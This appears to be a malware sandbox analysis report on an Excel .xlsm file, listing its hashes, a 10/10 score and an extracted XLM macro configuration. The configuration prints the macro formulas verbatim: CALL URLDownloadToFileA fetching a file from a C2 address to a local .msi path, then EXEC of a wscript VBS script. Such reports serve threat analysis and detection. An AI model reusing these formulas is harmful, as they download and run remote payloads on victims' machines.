General

  • Target

    8c3f1a8e66ba145496d0eb11c5d51ca5

  • Size

    6KB

  • MD5

    8c3f1a8e66ba145496d0eb11c5d51ca5

  • SHA1

    aaf3af820bca7a136a2a895080edc85401a86b7a

  • SHA256

    ae1a73384724381e0f0c58a7761bba4cac031b3aea9247ec26695955fb6db7ef

  • SHA512

    fd492d3d59f7adfbcbf6438e32652b517ecf4b1cb0f4071df0c3abecc501388b92b8fa2f6598403b1a8607b77239256bc8ab91820cfbbf59d17e2ead1783e52c

  • SSDEEP

    192:NDSluSEbrA2OmmfRD8UhHFBFYulb98yM2+x:NGuNM2wh1FY8b98yMN

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

  • 8c3f1a8e66ba145496d0eb11c5d51ca5
    .xlsm office2007